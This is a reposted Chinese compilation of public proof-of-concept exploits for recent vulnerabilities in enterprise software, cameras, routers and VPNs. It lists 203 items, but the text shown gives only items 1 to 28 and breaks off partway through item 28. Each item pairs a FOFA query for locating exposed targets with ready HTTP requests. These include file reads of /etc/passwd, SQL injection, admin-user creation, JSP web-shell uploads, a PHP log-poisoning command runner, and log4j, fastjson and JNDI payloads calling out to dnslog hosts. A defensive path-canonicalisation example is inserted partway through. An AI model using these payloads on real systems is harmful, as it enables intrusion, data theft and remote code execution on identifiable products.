Compilation of publicly disclosed Internet vulnerabilities, 202309-202406 (repost)

Posted 2024-6-5 14:31:29

Compilation of publicly disclosed Internet vulnerabilities, 202309-202406
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of Nday vulnerabilities accounts for a large share of attack activity in offensive and defensive exercises; we hope this article helps with defence. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 public POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long have their payload replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal: if any content infringes on a party's legitimate rights, contact the 网络安全新视界 team through the back end and the relevant content will be removed.

Statement

To keep things simple and easy to browse, the full list is not gated behind "reply to view". This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow our public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 back end sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue combat dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want to use.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin back end with the default admin account, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (DocCMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step two: POST to the login form. The language parameter traverses into application/logs, so the PHP in the login field is written into the day's log file; that PHP stub runs whatever base64-encoded command arrives in the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Step three: send the following request to the target to run the id command. The ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= value in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

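Added example, not code from the original compilation or from Casdoor or jshERP: items 2 and 14/15 are the same mistake seen twice. The access-control or file-serving check is applied to the raw request path, while the framework later interprets "..", ";param" suffixes and percent-encoding and ends up at a different resource. The Python below canonicalises the path first and makes both decisions on the canonical form only. PROTECTED_PREFIXES, STATIC_ROOT and the file names are assumptions chosen for illustration.

```python
"""Canonicalise a request path before making authorisation or
file-serving decisions on it.

Added example, not code from the original compilation or from Casdoor or
jshERP. Items 2 (/static/../../etc/passwd) and 14/15
(/user/getAllList;.ico, /user/a.ico/../getAllList) both work because the
check runs on the raw path while the server later interprets '..',
';param' suffixes and percent-encoding. PROTECTED_PREFIXES, STATIC_ROOT
and the file names below are assumptions for illustration.
"""
import posixpath
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5


def canonicalize(raw_target: str) -> str:
    """Return the absolute path the server will actually act on.

    - drops the query string
    - percent-decodes until the string stops changing, so double encoding
      such as %252e%252e does not survive
    - treats backslashes as separators (servers on Windows accept both)
    - removes ';param' path parameters from every segment (Servlet/Spring
      style, which is what makes 'getAllList;.ico' look like an .ico file)
    - resolves '.' and '..'; segments that would climb above '/' are dropped
    """
    path = raw_target.split('?', 1)[0]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace('\\', '/')
    segments = []
    for seg in path.split('/'):
        seg = seg.split(';', 1)[0]
        if seg in ('', '.'):
            continue
        if seg == '..':
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return '/' + '/'.join(segments)


# Assumed: endpoints that must only be reachable with a valid session.
PROTECTED_PREFIXES = ('/jshERP-boot/user/',)


def requires_auth(raw_target: str) -> bool:
    """Authorisation decision made on the canonical path, never the raw one."""
    return canonicalize(raw_target).startswith(PROTECTED_PREFIXES)


# Assumed document root for everything served under /static/.
STATIC_ROOT = '/srv/app/static'


def resolve_static(raw_target: str):
    """Map /static/<rel> to a file under STATIC_ROOT.

    Returns None for non-static requests and for anything that would
    leave STATIC_ROOT (the Casdoor item above). canonicalize() already
    removed '..'; the containment check stays as a second line of defence.
    """
    canon = canonicalize(raw_target)
    if not canon.startswith('/static/'):
        return None
    full = posixpath.normpath(posixpath.join(STATIC_ROOT, canon[len('/static/'):]))
    if full != STATIC_ROOT and not full.startswith(STATIC_ROOT + '/'):
        return None
    return full
```

The order of operations matters: decode first, then strip path parameters, then collapse dot segments. Matching `;.ico` or `..` against the raw string before decoding misses `%3b.ico` and `%2e%2e`, which is the kind of gap the two jshERP variants exploit.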
16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
